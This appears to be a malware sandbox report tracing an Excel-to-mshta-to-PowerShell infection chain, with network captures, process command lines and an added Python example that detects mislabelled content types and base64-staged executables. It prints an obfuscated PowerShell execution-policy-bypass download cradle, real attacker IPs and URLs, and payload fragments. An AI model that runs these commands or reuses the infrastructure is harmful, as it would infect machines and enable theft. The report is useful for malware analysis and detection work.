                                              Sep 9, 2024 17:49:04.335128069 CEST | 1236 | IN | Data Raw: 00 6e 00 4a 00 68 00 50 00 22 00 0d 00 0a 00 62 00 71 00 62 00 62 00 55 00 5a 00 75 00 42 00 6b 00 6f 00 48 00 6f 00 20 00 3d 00 20 00 22 00 7a 00 57 00 6b 00 5a 00 57 00 57 00 57 00 4c 00 65 00 6f 00 57 00 65 00 22 00 0d 00 0a 00 69 00 43 00 57
                                              Data Ascii: nJhP"bqbbUZuBkoHo = "zWkZWWWLeoWe"iCWKpaKPnWia = "LzUBNZbGPjTG"UWWKphdccNeO = "LkdcCBzulTou"NCAoHvOWmnKZ = "keKtL
                                              Sep 9, 2024 17:49:04.335138083 CEST | 1236 | IN | Data Raw: 00 3d 00 20 00 22 00 53 00 49 00 69 00 6c 00 50 00 69 00 5a 00 4b 00 4f 00 6b 00 4c 00 70 00 22 00 0d 00 0a 00 61 00 74 00 70 00 75 00 54 00 55 00 4c 00 50 00 4c 00 43 00 65 00 41 00 20 00 3d 00 20 00 22 00 52 00 6d 00 62 00 4b 00 6f 00 6b 00 61
                                              Data Ascii: = "SIilPiZKOkLp"atpuTULPLCeA = "RmbKokaicPGi"eWWLuLzaLdPi = "LRCWUoiJfttf"uUTLKffoooalamutu = "LlWlAhsLoKalamutu"
                                              Sep 9, 2024 17:49:04.335232973 CEST | 1236 | IN | Data Raw: 00 48 00 50 00 4c 00 65 00 6e 00 22 00 0d 00 0a 00 62 00 6d 00 4c 00 50 00 4c 00 4b 00 53 00 69 00 74 00 62 00 65 00 47 00 20 00 3d 00 20 00 22 00 4c 00 62 00 71 00 4c 00 6d 00 4e 00 69 00 6d 00 42 00 69 00 64 00 65 00 22 00 0d 00 0a 00 4c 00 47
                                              Data Ascii: HPLen"bmLPLKSitbeG = "LbqLmNimBide"LGKnhoLkxkZc = "UWuWAWUQRgbN"GWGGWsehipGh = "eOepKJUonUHi"iGUbWxWKtmNO = "CzcU
                                              Sep 9, 2024 17:49:04.335277081 CEST | 1236 | IN | Data Raw: 00 5a 00 57 00 76 00 48 00 75 00 20 00 3d 00 20 00 22 00 63 00 74 00 6c 00 4b 00 57 00 4e 00 55 00 7a 00 4b 00 47 00 4e 00 4b 00 22 00 0d 00 0a 00 6b 00 69 00 55 00 48 00 4b 00 42 00 75 00 63 00 4c 00 50 00 6e 00 57 00 20 00 3d 00 20 00 22 00 73
                                              Data Ascii: ZWvHu = "ctlKWNUzKGNK"kiUHKBucLPnW = "sjLpZWWKKLvW"ghWpZUzLdIUz = "RtzizkiGuZKP"UcKfUCmhKGLP = "NKkApWNvLLkO"tzcG
                                              Sep 9, 2024 17:49:04.335288048 CEST | 1236 | IN | Data Raw: 00 6b 00 22 00 0d 00 0a 00 47 00 63 00 57 00 47 00 6c 00 7a 00 4e 00 68 00 5a 00 6c 00 4c 00 43 00 20 00 3d 00 20 00 22 00 41 00 4f 00 4c 00 6d 00 4c 00 69 00 4e 00 75 00 63 00 63 00 4c 00 4c 00 22 00 0d 00 0a 00 42 00 47 00 65 00 70 00 4c 00 57
                                              Data Ascii: k"GcWGlzNhZlLC = "AOLmLiNuccLL"BGepLWcUGgfl = "gkLksfvGLsWL"uHZqtORWhZRN = "ZfkLfbLoWGeH"SWWLpcLLzOpq = "WQKCKziK
                                              Sep 9, 2024 17:49:04.335297108 CEST | 1236 | IN | Data Raw: 00 53 00 75 00 4c 00 57 00 6a 00 22 00 0d 00 0a 00 57 00 4c 00 6d 00 68 00 5a 00 6a 00 69 00 55 00 4e 00 55 00 74 00 47 00 20 00 3d 00 20 00 22 00 4b 00 57 00 43 00 4b 00 63 00 62 00 4f 00 57 00 47 00 4f 00 76 00 57 00 22 00 0d 00 0a 00 6c 00 57
                                              Data Ascii: SuLWj"WLmhZjiUNUtG = "KWCKcbOWGOvW"lWOtGmmLUilP = "mkaWhKZkLpalamutu"BlfiKWacLzeW = "UUKWJAGWZKep"aGfLBixjPGum =
                                              Sep 9, 2024 17:49:04.335485935 CEST | 1000 | IN | Data Raw: 00 20 00 3d 00 20 00 22 00 42 00 68 00 6b 00 4b 00 74 00 41 00 76 00 69 00 5a 00 57 00 47 00 43 00 22 00 0d 00 0a 00 57 00 41 00 70 00 41 00 6b 00 69 00 47 00 4c 00 49 00 4e 00 5a 00 57 00 20 00 3d 00 20 00 22 00 4c 00 51 00 47 00 61 00 4a 00 6f
                                              Data Ascii: = "BhkKtAviZWGC"WApAkiGLINZW = "LQGaJoLdcjOk"LPaPWKvCRCbi = "qAfqqLOobcSi"kQWkakLgQKuq = "ohPkZxKzJhLW"xkoIUIGTA
                                              Sep 9, 2024 17:49:04.335506916 CEST | 1236 | IN | Data Raw: 00 20 00 22 00 4b 00 57 00 78 00 73 00 78 00 57 00 7a 00 4f 00 61 00 6c 00 61 00 6d 00 75 00 74 00 75 00 41 00 4c 00 22 00 0d 00 0a 00 63 00 75 00 65 00 65 00 50 00 41 00 69 00 4c 00 4c 00 4c 00 50 00 6b 00 20 00 3d 00 20 00 22 00 75 00 78 00 7a
                                              Data Ascii: "KWxsxWzOalamutuAL"cueePAiLLLPk = "uxzkGmfAPNnL"csBcGdKRWGpk = "iLookQLLsQcP"fKdUgJgiLpKK = "LoeiiIJcLxoW"WiCi
                                              Sep 9, 2024 17:49:04.335592985 CEST | 1236 | IN | Data Raw: 00 0d 00 0a 00 5a 00 42 00 57 00 78 00 4c 00 53 00 71 00 6d 00 72 00 63 00 6b 00 47 00 20 00 3d 00 20 00 22 00 6b 00 57 00 76 00 5a 00 57 00 62 00 61 00 57 00 6d 00 74 00 62 00 4b 00 22 00 0d 00 0a 00 75 00 68 00 57 00 4f 00 41 00 4e 00 41 00 69
                                              Data Ascii: ZBWxLSqmrckG = "kWvZWbaWmtbK"uhWOANAiWzLp = "iBqioiojizLK"xnNKALGkWbNG = "nGxfkbfbkPKk"GitJUicAAhiS = "WAfzRLdU
                                              Sep 9, 2024 17:49:04.340112925 CEST | 1236 | IN | Data Raw: 00 66 00 6b 00 64 00 48 00 4f 00 61 00 4b 00 73 00 66 00 4b 00 22 00 0d 00 0a 00 4c 00 50 00 68 00 66 00 66 00 71 00 4c 00 51 00 70 00 4b 00 4a 00 61 00 20 00 3d 00 20 00 22 00 66 00 4b 00 57 00 55 00 52 00 68 00 6a 00 54 00 47 00 4b 00 55 00 6f
                                              Data Ascii: fkdHOaKsfK"LPhffqLQpKJa = "fKWURhjTGKUo"kLLgKLiNAKxU = "zoCAWmclJdCN"hLTKKkCUpWko = "uGUltLckpmxG"LLKizKACGzWf
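
The response above declares Content-Type: image/tiff, but its body starts with ff fe, the UTF-16LE byte order mark, followed by text that reads as assignment statements (uWbGgWlmGLif = "PWzfWPpUziNq" and so on); a TIFF file starts with 49 49 2a 00 or 4d 4d 00 2a. The next session's /200/NRSCER.txt response is served as text/plain with a 659456-byte body made of base64-alphabet characters. Both are the same lesson: the declared type is attacker-controlled, so classify by the bytes. The checks below are an added example, not code from the sandbox or from the payload. The first compares the declared type with the leading bytes using a deliberately small magic table; the second decodes a base64 body in both orientations and reports whether an MZ header appears (trying the reversed orientation is the example's choice, not a finding about the capture). The MZ stub is constructed; the only captured bytes reused are the first eight of the image/tiff body.

```python
"""Check a declared Content-Type against the bytes actually served, then probe a
base64 body for a PE image in either orientation.

Added example, not from the sandbox report and not the payload's code. The
magic table is the example's own (assumed sufficient for this chain); the
"PE" is a constructed MZ-prefixed stub, not the captured file. The only
captured bytes used are the first eight of the image/tiff body.
"""
import base64
import re

MAGIC = (
    (b"II*\x00", "tiff"),
    (b"MM\x00*", "tiff"),
    (b"MZ", "pe"),
    (b"\xff\xfe", "utf16le-text"),
    (b"\xfe\xff", "utf16be-text"),
)
_DECLARED = {
    "image/tiff": "tiff",
    "text/plain": "text",
    "text/html": "text",
    "application/hta": "text",
    "application/octet-stream": "any",
}


def sniff(data: bytes) -> str:
    """Classify by leading bytes; printable ASCII falls back to 'text', anything else to 'binary'."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    head = data[:512]
    if head and all(32 <= b < 127 or b in (9, 10, 13) for b in head):
        return "text"
    return "binary"


def content_mismatch(content_type: str, data: bytes) -> bool:
    """True when the served bytes cannot be what the Content-Type header claims."""
    declared = _DECLARED.get(content_type.split(";")[0].strip().lower(), "unknown")
    if declared in ("any", "unknown"):
        return False
    actual = sniff(data)
    if declared == "text":
        return not (actual == "text" or actual.endswith("-text"))
    return actual != declared


_B64 = re.compile(rb"^[A-Za-z0-9+/=\s]+$")


def pe_from_base64(body: bytes):
    """Decode a base64-only body forward and reversed; return (orientation, bytes) when an MZ header appears.

    Storing the base64 string reversed is a common obfuscation, so both orientations
    are tried; that is this example's design choice, not a finding about the capture.
    """
    if not _B64.match(body):
        return None
    compact = re.sub(rb"\s", b"", body)
    for orientation, text in (("forward", compact), ("reversed", compact[::-1])):
        try:
            blob = base64.b64decode(text, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        if blob.startswith(b"MZ"):
            return orientation, blob
    return None


# Constructed inputs
TIFF_MISLABELLED = bytes.fromhex("fffe750057006200")  # first bytes of the image/tiff body: UTF-16LE BOM, then 'u','W','b'
STUB_PE = b"MZ\x90\x00" + b"\x00" * 55 + b"PE\x00\x00"  # 63 bytes, constructed, not an executable
FORWARD_B64 = base64.b64encode(STUB_PE)
REVERSED_B64 = FORWARD_B64[::-1]

if __name__ == "__main__":
    print("image/tiff body mismatch:", content_mismatch("image/tiff", TIFF_MISLABELLED), sniff(TIFF_MISLABELLED))
    print("forward blob:", pe_from_base64(FORWARD_B64)[0])
    print("reversed blob:", pe_from_base64(REVERSED_B64)[0])
```

For the image/tiff response, sniff() returns utf16le-text and the mismatch check fires; decoding that body as UTF-16LE is the next step, not treating it as an image. For a text/plain body the base64 probe is what matters, and an MZ header in either orientation means the "text" is a staged executable.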


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.22 | 49169 | 185.235.137.223 | 80 | 3940 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 9, 2024 17:49:12.774596930 CEST | 79 | OUT | GET /200/NRSCER.txt HTTP/1.1
                                              Host: 185.235.137.223
                                              Connection: Keep-Alive
                                              Sep 9, 2024 17:49:13.417831898 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              Date: Mon, 09 Sep 2024 15:49:13 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                              Last-Modified: Sun, 08 Sep 2024 23:50:30 GMT
                                              ETag: "a1000-621a44e37f5ce"
                                              Accept-Ranges: bytes
                                              Content-Length: 659456
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/plain
                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                              Data Ascii: [TRUNCATED]
                                              Sep 9, 2024 17:49:13.417851925 CEST | 224 | IN | Data Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1
                                              Sep 9, 2024 17:49:13.417900085 CEST | 1236 | IN | Data Raw: 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44 51 30 67 43 4e 67 51 44 48 30 77 41
                                              Data Ascii: AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZN
                                              Sep 9, 2024 17:49:13.417957067 CEST224INData Raw: 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44
                                              Data Ascii: nDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNk
                                              Sep 9, 2024 17:49:13.418266058 CEST1236INData Raw: 63 44 48 33 51 78 4e 4d 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 31 32 77 73 4e 45 62 44 76 32 51 72 4e 73 61 44 70 32 77 70 4e 55 61 44 6a 32 51 6f 4e 38 5a 44 64 32 77 6d 4e 6b 5a 44 58 32 51 6c 4e 4d 5a 44 52 32 77 6a 4e 30 59 44
                                              Data Ascii: cDH3QxNMcDB2wvN0bD72QuNcbD12wsNEbDv2QrNsaDp2wpNUaDj2QoN8ZDd2wmNkZDX2QlNMZDR2wjN0YDL2QiNcYDF2wgNEUD/1QfNsXD51wdNUXDz1QcN8WDt1waNkWDn1QZNMWDh1wXN0VDb1QWNEQD/0QPNsTD50wNNUTDz0QMN8SDt0wKNkSDn0QJNMSDh0wHN0RDb0QGNcRDV0wENERDP0QDNsQDJzg0M8MDMzQyMYMDD
                                              Sep 9, 2024 17:49:13.418289900 CEST1236INData Raw: 67 62 4e 77 57 44 71 31 41 61 4e 59 57 44 6b 31 67 59 4e 41 57 44 65 31 41 58 4e 6f 56 44 59 31 67 56 4e 51 56 44 53 31 41 55 4e 34 55 44 4d 31 67 53 4e 67 55 44 47 31 41 52 4e 49 55 44 41 30 67 50 4e 77 54 44 36 30 41 4f 4e 59 54 44 30 30 67 4d
                                              Data Ascii: gbNwWDq1AaNYWDk1gYNAWDe1AXNoVDY1gVNQVDS1AUN4UDM1gSNgUDG1ARNIUDA0gPNwTD60AONYTD00gMNATDu0ALNoSDo0gJNQSDi0AIN4RDc0gGNgRDW0AFNIRDQ0gDNwQDK0ACNYQDE0gANAMD+zA/MoPD4zg9MQPDyzA8M4ODszg6MgODmzA5MIODgzg3MwNDazA2MYNDUzg0MANDOzAzMoMDIzgxMQMDCzAgM4LD8yguM
                                              Sep 9, 2024 17:49:13.418303013 CEST1236INData Raw: 4f 44 70 7a 41 36 4d 63 4f 44 6d 7a 51 35 4d 51 4f 44 6a 7a 67 34 4d 45 4f 44 67 7a 77 33 4d 34 4e 44 64 7a 41 33 4d 73 4e 44 61 7a 51 32 4d 67 4e 44 58 7a 67 31 4d 55 4e 44 55 7a 77 30 4d 49 4e 44 52 7a 41 30 4d 38 4d 44 4f 7a 51 7a 4d 77 41 44
                                              Data Ascii: ODpzA6McODmzQ5MQODjzg4MEODgzw3M4NDdzA3MsNDazQ2MgNDXzg1MUNDUzw0MINDRzA0M8MDOzQzMwADzwQMM8CDtwwKMkCDnwQJMMCDhwwHM0BDbwQGMcBDVwwEMEBDPwQDMsADJwwBMUADDwQAAAIAoAUAoA8D//Q/Ps/D5/w9PU/Dz/Q8P8+Dt/w6Pk+Dn/Q5PM+Dh/w3P09Db/Q2Pc9DV/w0PE9DP/QzPs8DJ/wxPU8DD
                                              Sep 9, 2024 17:49:13.418428898 CEST1236INData Raw: 77 61 50 4f 32 44 68 39 45 58 50 6d 74 44 56 36 55 63 4f 49 5a 54 2f 32 6f 73 4e 54 59 44 41 31 45 65 4e 53 58 54 71 31 55 5a 4e 74 55 6a 4a 31 38 52 4e 59 45 44 31 41 41 41 41 55 42 51 42 51 42 67 50 50 37 44 79 2b 45 70 50 4a 32 44 6c 36 6f 6d
                                              Data Ascii: waPO2Dh9EXPmtDV6UcOIZT/2osNTYDA1EeNSXTq1UZNtUjJ18RNYED1AAAAUBQBQBgPP7Dy+EpPJ2Dl6omOjpDL6QiMRFT5woFAAAAIAUAQAAAA/49PH/DN+ErPM0Tk90SPNwju8sjOamTu5caOVmjH4wOOcjT024uNdXj2yEoM5JzYy0kMyAD+AAAAABQBwAAAA8Dn/AgPB7jA7UYORhzb4AFOIcT+345NKdDQ2YvNubTm1EfN
                                              Sep 9, 2024 17:49:13.418442011 CEST1236INData Raw: 75 6a 56 36 45 76 4f 58 71 44 6a 36 38 6e 4f 63 70 6a 50 35 45 59 4f 34 67 7a 35 34 6f 4d 4f 32 69 54 4a 32 45 74 4e 43 5a 7a 49 32 51 51 4e 5a 54 7a 62 7a 49 30 4d 59 4d 6a 44 79 34 6b 4d 6b 49 44 42 78 45 64 4d 34 42 44 37 77 51 4f 41 41 41 41
                                              Data Ascii: ujV6EvOXqDj68nOcpjP5EYO4gz54oMO2iTJ2EtNCZzI2QQNZTzbzI0MYMjDy4kMkIDBxEdM4BD7wQOAAAAaAQAwAAAA/MzPr4zi+kmPO5DR+cQPt2zl8kPPGzzg8UDPrsDv7whOArTQ68hOCkzz5MbOCmDV4sMOvijh401NffTw3g5NvdDA2IuNDbTu2MqNEaTT1YdNGXzu1QZNbVDP0ALNASTY0UENFMz7zk2MYNzQzAhMuKzp
                                              Sep 9, 2024 17:49:13.418452978 CEST1236INData Raw: 41 67 50 67 33 44 34 39 6b 42 50 2f 7a 44 37 38 49 4e 50 2f 79 54 70 37 63 37 4f 78 75 7a 48 36 6f 52 4f 69 6c 7a 57 35 41 55 4f 36 6b 7a 4d 35 55 53 4f 61 6b 7a 45 34 59 4f 4f 4e 6a 7a 4b 32 51 71 4e 68 59 44 42 31 77 66 4e 7a 58 7a 78 31 55 45
                                              Data Ascii: AgPg3D49kBP/zD78INP/yTp7c7OxuzH6oROilzW5AUO6kzM5USOakzE4YOONjzK2QqNhYDB1wfNzXzx1UEN0TD70kJNhJjBwgDMoAAAAQFAEAFA/M+Pk+TI+ImPI1z29AdP+2Du7cZO5nDU50wNtfTY3AkN1bT62UtNPbTx2orN2YjL2YiNXYTD2IQNOXjl08INURjFzo/MmPjmzY3M5Iz8yktMyKjfycjMuITHxgfMgHD2xwcM
                                              Sep 9, 2024 17:49:13.422858000 CEST1236INData Raw: 6b 6a 73 35 67 61 4f 65 6c 44 56 35 45 53 4f 55 67 6a 5a 34 34 46 4f 56 68 44 47 34 38 77 4e 31 66 54 66 33 45 33 4e 4d 59 44 61 31 45 56 4e 46 56 44 46 31 34 51 4e 48 51 54 2b 30 6b 4e 4e 39 53 54 73 30 41 4b 4e 46 53 7a 64 30 30 47 4e 6a 52 7a
                                              Data Ascii: kjs5gaOelDV5ESOUgjZ44FOVhDG48wN1fTf3E3NMYDa1EVNFVDF14QNHQT+0kNN9STs0AKNFSzd00GNjRzR0MDNLMD8zo+McPzuzs6MmODlxcDMTAAAAwFADAKAAAwPE/TN+wdP5wz44wqNwbD62IuNKbTK00FNMNTSy4tMZLTwycnMXJzBxYbM1FjSwEPMfDz1w8FAAAAQAMAkA8Dq/w5PK+TZ/s1PL9jR/4zPO8TC/QgP47T0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.22 | 49172 | 178.237.33.50 | 80 | 4064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 9, 2024 17:49:16.184298992 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                              Host: geoplugin.net
                                              Cache-Control: no-cache
                                              Sep 9, 2024 17:49:16.819039106 CEST | 1170 | IN | HTTP/1.1 200 OK
                                              date: Mon, 09 Sep 2024 15:49:16 GMT
                                              server: Apache
                                              content-length: 962
                                              content-type: application/json; charset=utf-8
                                              cache-control: public, max-age=300
                                              access-control-allow-origin: *
                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.22 | 49163 | 95.217.202.210 | 443 | 3236 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-09 15:48:55 UTC | 319 | OUT | GET /yDfvh HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: zeep.ly
                                              Connection: Keep-Alive
                                              2024-09-09 15:48:56 UTC | 510 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Mon, 09 Sep 2024 15:48:56 GMT
                                              Server: Apache
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Set-Cookie: PHPSESSID=8cd3dbd06893a5c7e0fa0cf74aa14fe9; path=/
                                              Set-Cookie: short_478567=1; expires=Mon, 09-Sep-2024 16:03:56 GMT; Max-Age=900; path=/; HttpOnly
                                              location: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta
                                              Content-Length: 0
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.22 | 49165 | 95.217.202.210 | 443 | 3504 | C:\Windows\System32\mshta.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-09 15:48:58 UTC | 367 | OUT | GET /yDfvh HTTP/1.1
                                              Accept: */*
                                              Accept-Language: en-US
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: zeep.ly
                                              Connection: Keep-Alive
                                              Cookie: short_478567=1
                                              2024-09-09 15:48:58 UTC | 412 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Mon, 09 Sep 2024 15:48:58 GMT
                                              Server: Apache
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Set-Cookie: PHPSESSID=30ad27ae134d951fbb0634292c04cc32; path=/
                                              location: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta
                                              Content-Length: 0
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.22 | 49168 | 207.241.227.96 | 443 | 3940 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-09 15:49:10 UTC | 113 | OUT | GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1
                                              Host: ia601706.us.archive.org
                                              Connection: Keep-Alive
                                              2024-09-09 15:49:10 UTC | 582 | IN | HTTP/1.1 200 OK
                                              Server: nginx/1.25.1
                                              Date: Mon, 09 Sep 2024 15:49:10 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 1931225
                                              Last-Modified: Thu, 05 Sep 2024 02:35:43 GMT
                                              Connection: close
                                              ETag: "66d918ff-1d77d9"
                                              Strict-Transport-Security: max-age=15724800
                                              Expires: Mon, 09 Sep 2024 21:49:10 GMT
                                              Cache-Control: max-age=21600
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                              Access-Control-Allow-Credentials: true
                                              Accept-Ranges: bytes



                                              Target ID:0
                                              Start time:11:48:04
                                              Start date:09/09/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13fbe0000
                                              File size:28'253'536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:4
                                              Start time:11:48:55
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\mshta.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                              Imagebase:0x13f410000
                                              File size:13'824 bytes
                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:11:48:59
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))"
                                              Imagebase:0x4a1e0000
                                              File size:345'088 bytes
                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:11:48:59
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))"
                                              Imagebase:0x13faa0000
                                              File size:443'392 bytes
                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
